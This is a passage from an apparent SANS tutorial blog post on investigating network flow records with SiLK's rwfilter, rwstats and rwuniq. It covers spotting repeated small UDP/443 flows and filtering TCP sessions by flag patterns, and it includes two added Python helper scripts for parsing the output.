<span style="color: white;">2022/02/18T18:00:00| 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| out| 124|</span>
</pre></td></tr></tbody></table></div>
<br />Do we have similar traffic on the inside? Removing the <i>--type</i> restriction from <b><i>rwfilter</i></b> so records of every type are included.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes --fields=stime,sip,dip,sport,dport,packets,duration,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count=5 --ipv6-policy=ignore --no-percent --bin=3600</span></b></span>
<span style="color: white;">INPUT: 147455 Records for 147297 Bins and 92351786 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type| Bytes|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.3.173|34796| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.2.183|54576| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.14.48|33192| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.12.198|58278| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.14.69|48240| 443| 32| 0| inweb| 1920|</span>
</pre></td></tr></tbody></table></div>
<br />Taking a different view. Looking for smaller outbound transfers. Note the <i>--type=out,outweb</i>. Maybe beaconing? We also talk about detecting beaconing in <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a> using the Fast Fourier Transform. The byte counts below are identical (248 bytes each) for the 3 unique source hosts.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore</span></b></span>
<span style="color: white;">INPUT: 6 Records for 3 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.20.6| 248| 33.333333| 33.333333|</span>
<span style="color: white;"> 172.28.30.4| 248| 33.333333| 66.666667|</span>
<span style="color: white;"> 172.28.30.3| 248| 33.333333|100.000000|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some additional protocol statistics via <b><i>rwfilter</i></b> and <b><i>rwstats</i></b>. Note the <i>--print-statistics </i>for <b><i>rwfilter</i></b>, which prints the Files/Read/Pass/Fail summary, and <i>--detail-proto-stats=6</i> for <b><i>rwstats</i></b>, which prints the min/max byte and packet statistics for TCP.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--print-statistics | rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--detail-proto-stats=6 | grep "min"</span></b></span>
<span style="color: white;">Files 1235. Read 1894243. Pass 6. Fail 1894237.</span>
<span style="color: white;">*BYTES min 124; max 124</span>
<span style="color: white;">*PACKETS min 1; max 1</span>
<span style="color: white;">*BYTES/PACKET min 124; max 124</span>
</pre></td></tr></tbody></table></div>
<br />Revisiting the source IPs with the low byte counts. What destinations are they communicating with? Adding the destination IP (<i>dip</i>), the ports and the packet count to the <b><i>rwstats</i></b> fields.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwstats --value=bytes --fields=sip,dip,sport,dport,packets --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--no-percent</span></b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets| Bytes|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.216|56289| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|56311| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4| 184.51.157.69|58644| 443| 1| 124|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.215|49308| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4| 23.58.146.215|57496| 443| 1| 124|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Obviously something is wrong above. There is just too much commonality there. Let's see: every flow is a single packet of 124 bytes, and 124 - (20 (IP header length) + (assume) 20 (TCP header)) = 84 bytes, so each of these packets carries ~84 bytes of data above the IP and TCP headers. Look at the IPs as well to find the commonality.<br /><br />Resolve the destination IP addresses of the hosts above, using <b><i>rwresolve</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --type=out,outweb \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--dport=443 --bytes-per-packet=0-250 | rwstats --value=bytes --fields=sip,dip,sport,dport,packets --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--no-percent | rwresolve</span></b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets| Bytes|</span>
<span style="color: white;"> 172.28.20.6|a23-58-146-216.deploy.static.akamaitechnologies.com|56289| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.3|a23-58-146-216.deploy.static.akamaitechnologies.com|56311| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4|a184-51-157-69.deploy.static.akamaitechnologies.com|58644| 443| 1| 124|</span>
<span style="color: white;"> 172.28.20.6|a23-58-146-215.deploy.static.akamaitechnologies.com|49308| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4|a23-58-146-215.deploy.static.akamaitechnologies.com|57496| 443| 1| 124|</span>
</pre></td></tr></tbody></table></div>
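<p>As an added example (not code from the original post or from SiLK), here is a small Python parser for the pipe-delimited tables that rwstats and rwuniq print. It derives bytes per packet and the estimated data above the IP and transport headers (the 124 - 20 - 20 = 84 arithmetic above, and the UDP case with an 8-byte header), then groups flows whose shape (destination, port, protocol, packets, bytes, duration) repeats across several source hosts, which is the commonality noted above. The sample table is constructed, modelled on the rows above with the proto column from the --fields run further down the post; the function names are this example's own.</p>

```python
"""Find repeated flow shapes in rwstats/rwuniq-style output.

Added example for this post; not code from the original or from SiLK.
It parses the pipe-delimited table that rwstats and rwuniq print,
derives bytes per packet and an estimated payload per packet, and
groups flows whose shape repeats across several source hosts.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

IP_HEADER = 20                 # IPv4 header without options
L4_HEADER = {6: 20, 17: 8}     # TCP and UDP header sizes without options


@dataclass(frozen=True)
class Flow:
    sip: str
    dip: str
    sport: int
    dport: int
    proto: int
    packets: int
    bytes: int
    duration: int

    @property
    def bytes_per_packet(self) -> float:
        return self.bytes / self.packets

    @property
    def est_payload_per_packet(self) -> float:
        """SiLK's bytes column counts IP-layer bytes, so subtract the IP
        header and the transport header for the flow's protocol. A single
        124-byte packet leaves 84 bytes above TCP headers or 96 above UDP."""
        return self.bytes_per_packet - IP_HEADER - L4_HEADER.get(self.proto, 0)


def parse_silk_table(text: str) -> list[Flow]:
    """Parse rwstats/rwuniq output. Banner lines (INPUT:/OUTPUT:) carry no
    pipe and are skipped; the header row maps column names to positions,
    so the order given to --fields does not matter."""
    rows = [ln for ln in text.splitlines() if "|" in ln]
    header = [c.strip() for c in rows[0].split("|")]
    idx = {name: i for i, name in enumerate(header)}
    flows = []
    for ln in rows[1:]:
        c = [x.strip() for x in ln.split("|")]
        flows.append(Flow(
            sip=c[idx["sIP"]], dip=c[idx["dIP"]],
            sport=int(c[idx["sPort"]]), dport=int(c[idx["dPort"]]),
            proto=int(c[idx["pro"]]), packets=int(c[idx["packets"]]),
            bytes=int(c[idx["Bytes"]]), duration=int(c[idx["durat"]]),
        ))
    return flows


def shared_shapes(flows: list[Flow], min_sources: int = 2) -> dict[tuple, list[Flow]]:
    """Group flows by (dip, dport, proto, packets, bytes, duration) and keep
    the groups produced by at least min_sources distinct source IPs.
    Identical single-packet, zero-duration flows from several hosts to one
    destination are the pattern worth chasing (scripted checks, beaconing);
    one host retrying the same request is ordinary."""
    groups: dict[tuple, list[Flow]] = defaultdict(list)
    for f in flows:
        groups[(f.dip, f.dport, f.proto, f.packets, f.bytes, f.duration)].append(f)
    return {k: v for k, v in groups.items()
            if len({f.sip for f in v}) >= min_sources}


# Constructed sample modelled on the rwstats output in this post.
SAMPLE = """\
INPUT: 6 Records for 6 Bins and 744 Total Bytes
OUTPUT: Top 6 Bins by Bytes
            sIP|            dIP|sPort|dPort| packets|durat|pro|   Bytes|
    172.28.30.4|  23.58.146.215|57496|  443|       1|    0| 17|     124|
    172.28.30.3|  23.58.146.216|65523|  443|       1|    0| 17|     124|
    172.28.30.3|  23.58.146.216|56311|  443|       1|    0| 17|     124|
    172.28.20.6|  23.58.146.215|49308|  443|       1|    0| 17|     124|
    172.28.30.4|  184.51.157.69|58644|  443|       1|    0| 17|     124|
    172.28.20.6|  23.58.146.216|56289|  443|       1|    0| 17|     124|
"""


if __name__ == "__main__":
    flows = parse_silk_table(SAMPLE)
    for shape, members in shared_shapes(flows).items():
        dip, dport, proto, packets, nbytes, duration = shape
        sources = sorted({f.sip for f in members})
        print(f"{dip}:{dport}/{proto} {packets} pkt {nbytes} B dur {duration}s "
              f"payload~{members[0].est_payload_per_packet:.0f} B "
              f"from {len(sources)} sources: {', '.join(sources)}")
```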
<br />Focus on one particular address (23.58.146.216) using the <i>--any-address</i> flag with <b><i>rwfilter</i></b>, which matches it as either source or destination. Pipe the output to <b><i>rwstats</i></b>, this time adding the protocol (<i>proto</i>) to the fields.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--bytes</span><span>-per-packet=0-250 --duration=0- --any-address=23.58.146.216 | rwstats --value=bytes \</span></span></b></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=stime,sip,dip,sport,dport,packets,duration,type,proto --count=5 --ipv6-policy=ignore --no-percent \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin=3600</b></span>
<span style="color: white;">INPUT: 3 Records for 3 Bins and 372 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type|pro| Bytes|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| out| 17| 124|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| out| 17| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| out| 17| 124|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Above is interesting, as the traffic is all on UDP 443 (proto 17) rather than TCP. QUIC?</div><div><br />Keeping it simple by finding the first 10 records that match a particular query, using <b><i>rwfilter </i></b><i>--max-pass=10</i> and <b><i>rwuniq</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=6 --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-pass=10 | rwuniq --fields sip,sport,dip,dport</b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 52.109.88.36| 443| 172.28.10.89|56674| 1|</span>
<span style="color: white;"> 10.200.223.4|50494| 172.28.10.5| 22| 1|</span>
<span style="color: white;"> 142.250.72.10| 443| 172.28.20.5|53715| 1|</span>
<span style="color: white;"> 172.28.10.5| 22| 10.200.223.4|50494| 1|</span>
<span style="color: white;"> 52.109.88.36| 443| 172.28.10.89|56673| 1|</span>
<span style="color: white;"> 10.200.223.4|50673| 172.28.1.1| 22| 1|</span>
<span style="color: white;"> 142.250.72.35| 443| 172.28.30.5|53821| 1|</span>
<span style="color: white;"> 20.50.73.10| 443| 172.28.10.89|56669| 1|</span>
<span style="color: white;"> 20.189.173.13| 443| 172.28.10.80|64499| 1|</span>
<span style="color: white;"> 142.250.72.35| 443| 172.28.20.5|53714| 1|</span>
</pre></td></tr></tbody></table></div>
<br />Find the first 10 records that fail the query (think <i>grep --invert-match</i> or <i>grep -v</i>), using <b><i>rwfilter </i></b>and <b><i>rwuniq</i></b>. Notice that rather than <i>--pass-destination</i> it is now <i>--fail-destination</i>, with <i>--max-fail=10</i> in place of <i>--max-pass</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --fail-destination=stdout --max-fail=10 | rwuniq \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--fields sip,sport,dip,dport --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56104| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54512| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55382| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55171| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56350| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55339| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54864| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56290| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55359| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56213| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /><br />Combining the <b><i>rwfilter</i> </b><i>--pass-destination </i>and <i>--fail-destination </i>in one command, as well as writing the pass and fail sets to files. The first <b><i>rwfilter</i></b> passes up to 10 TCP records to stdout and writes up to 10 failing records to <i>6-fail.rw</i>; the second reads stdin, writes records with port 443 on either side (<i>--aport=443</i>) to <i>pass-443</i> and sends the remaining records on to <b><i>rwuniq</i></b>, which is why only the port 22 records are displayed.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=6 --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=10 --fail-destination=6-fail.rw --max-fail=10 | rwfilter stdin --aport=443 --fail-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=pass-443 | rwuniq --fields sip,sport,dip,dport</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 10.200.223.4|50494| 172.28.10.5| 22| 1|</span>
<span style="color: white;"> 172.28.10.5| 22| 10.200.223.4|50494| 1|</span>
<span style="color: white;"> 10.200.223.4|50673| 172.28.1.1| 22| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find 5 unique sessions that were initiated by the client, that is, the device sending the <i>SYN</i> packet. Note the <i>--flags-initial </i>with <b style="font-style: italic;">rwfilter</b>, which tests the flags of the first packet in the flow. <i>S/SA </i>means we test the <i>SYN</i> and <i>ACK </i>flags (the mask after the slash) and require only <i>SYN</i> to be set, so <i>ACK</i> must be clear.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --aport=443 --flags-initial=S/SA \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5 | rwuniq --fields stime,sIP,dIP,flags,initialflags,duration --values=records</span></b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|initialF|durat| Records|</span>
<span style="color: white;">2019/05/02T16:30:15| 172.16.10.13| 13.107.5.88| SRPA | S | 0| 1|</span>
<span style="color: white;">2019/05/02T16:29:56| 172.16.10.13| 65.55.44.108|FSRPA | S | 132| 1|</span>
<span style="color: white;">2019/05/02T16:31:04| 172.16.10.13| 65.55.44.109| SRPA | S | 4| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128|FS PA | S | 19| 1|</span>
<span style="color: white;">2019/05/02T16:30:15| 172.16.10.13| 13.107.3.128| SRPA | S | 0| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Similarly, find the devices acting as a server, meaning the device responded to a <i>SYN</i> with a <i>SYN/ACK</i>. Notice the <i><b>rwfilter </b>--flags-initial=SA/SA </i>now tests the <i>SYN </i>and <i>ACK </i>flags and requires both to be set in the initial packet.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$</span><b><span style="color: #fcff01;"> rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --aport=443 --flags-initial=SA/SA \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5 | rwuniq --fields stime,sIP,dIP,flags,initialflags,duration --values=records</span></b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|initialF|durat| Records|</span>
<span style="color: white;">2019/05/02T16:30:15| 13.107.3.128| 172.16.10.13| S A | S A | 0| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 157.55.135.128| 172.16.10.13|FSRPA | S A | 19| 1|</span>
<span style="color: white;">2019/05/02T16:31:04| 65.55.44.109| 172.16.10.13| S PA | S A | 4| 1|</span>
<span style="color: white;">2019/05/02T16:29:56| 65.55.44.108| 172.16.10.13| S PA | S A | 132| 1|</span>
<span style="color: white;">2019/05/02T16:30:15| 13.107.5.88| 172.16.10.13| S A | S A | 0| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /><div>Find 5 unique sessions that seem to have been fully completed. Notice the <i><b>rwfilter</b> --flags-all=SAFP/FSRPA </i>tests the <i>FIN, SYN, RST, PUSH and ACK </i>flags (the mask) and requires <i>SYN, ACK, FIN </i>and <i>PUSH </i>to be set, which leaves <i>RST</i> required to be clear. Unlike <i>--flags-initial</i>, <i>--flags-all</i> tests the cumulative flags seen over the whole flow.</div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --dport=22,80,443,4444 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--flags-</span></b></span><b><span style="color: #fcff01;"><span>all=SAFP/FSRPA --max-pass=5 | rwuniq --fields stime,sIP,dIP,dport,flags,type --values=records</span></span></b>
<span style="color: white;"> sTime| sIP| dIP|dPort| flags| type| Records|</span>
<span style="color: white;">2019/05/02T16:38:30| 172.16.10.13| 192.96.162.110| 80|FS PA | outweb| 1|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 192.96.162.33| 80|FS PA | outweb| 2|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 23.33.106.133| 80|FS PA | outweb| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128| 443|FS PA | outweb| 1|</span>
</pre></td></tr></tbody></table></div>
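<p>The HIGH/MASK flag semantics behind the three rwfilter queries above (--flags-initial=S/SA, --flags-initial=SA/SA and --flags-all=SAFP/FSRPA), reimplemented in Python as an added example that is not code from the original post or from SiLK. It parses rwuniq-style rows and labels each flow as client-initiated, server-side or completed; the sample rows are constructed from the output above, and the function names are this example's own.</p>

```python
"""SiLK-style TCP flag tests (HIGH/MASK) applied to rwuniq-style rows.

Added example for this post; not code from the original or from SiLK.
It reimplements the HIGH/MASK semantics behind rwfilter's --flags-initial
and --flags-all and uses them to label flows as client-initiated,
server-side or fully completed, as the three queries above do.
"""
from __future__ import annotations

from dataclasses import dataclass

# Flag letter -> bit, in the order SiLK prints them (F S R P A U E C).
FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08,
             "A": 0x10, "U": 0x20, "E": 0x40, "C": 0x80}


def parse_flags(text: str) -> int:
    """Convert a flag string such as 'FS PA ' or 'SAFP' to a bitmask.
    Spaces are the placeholders rwuniq prints for unset flags."""
    bits = 0
    for ch in text.upper():
        if ch == " ":
            continue
        if ch not in FLAG_BITS:
            raise ValueError(f"unknown TCP flag letter {ch!r}")
        bits |= FLAG_BITS[ch]
    return bits


def flags_match(observed: str, spec: str) -> bool:
    """Evaluate a HIGH/MASK specification against observed flags.

    Every flag in HIGH must be set and every flag in MASK that is not in
    HIGH must be clear; flags outside MASK are ignored. So:
      'S/SA'       -> SYN set, ACK clear        (client's first packet)
      'SA/SA'      -> SYN and ACK set           (server's first packet)
      'SAFP/FSRPA' -> SYN, ACK, FIN, PSH set, RST clear
    A spec without a slash is treated as HIGH/HIGH (this helper's own shortcut).
    """
    high_txt, _, mask_txt = spec.partition("/")
    high = parse_flags(high_txt)
    mask = parse_flags(mask_txt) if mask_txt else high
    if high & ~mask:
        raise ValueError(f"HIGH flags must be a subset of MASK in {spec!r}")
    return (parse_flags(observed) & mask) == high


@dataclass(frozen=True)
class Flow:
    stime: str
    sip: str
    dip: str
    flags: str          # cumulative flags of the flow ('flags' column)
    initial_flags: str  # flags of the first packet ('initialF' column)


def parse_rwuniq(text: str) -> list[Flow]:
    """Parse rwuniq output from --fields stime,sIP,dIP,flags,initialflags,...
    The header row maps column names to positions; flag cells keep their
    spacing because parse_flags ignores the blanks."""
    rows = [ln for ln in text.splitlines() if "|" in ln]
    header = [c.strip() for c in rows[0].split("|")]
    idx = {name: i for i, name in enumerate(header)}
    flows = []
    for ln in rows[1:]:
        c = ln.split("|")
        flows.append(Flow(
            stime=c[idx["sTime"]].strip(), sip=c[idx["sIP"]].strip(),
            dip=c[idx["dIP"]].strip(), flags=c[idx["flags"]],
            initial_flags=c[idx["initialF"]],
        ))
    return flows


def classify(flow: Flow) -> dict[str, bool]:
    """Apply the three tests the post runs: --flags-initial=S/SA,
    --flags-initial=SA/SA and --flags-all=SAFP/FSRPA."""
    return {
        "client_initiated": flags_match(flow.initial_flags, "S/SA"),
        "server_side": flags_match(flow.initial_flags, "SA/SA"),
        "completed": flags_match(flow.flags, "SAFP/FSRPA"),
    }


def summarize(text: str) -> dict[str, int]:
    """Count how many flows in an rwuniq table satisfy each test."""
    counts = {"client_initiated": 0, "server_side": 0, "completed": 0}
    for flow in parse_rwuniq(text):
        for label, hit in classify(flow).items():
            counts[label] += int(hit)
    return counts


# Constructed sample modelled on the rwuniq output in this post.
SAMPLE = """\
              sTime|            sIP|            dIP| flags|initialF|durat| Records|
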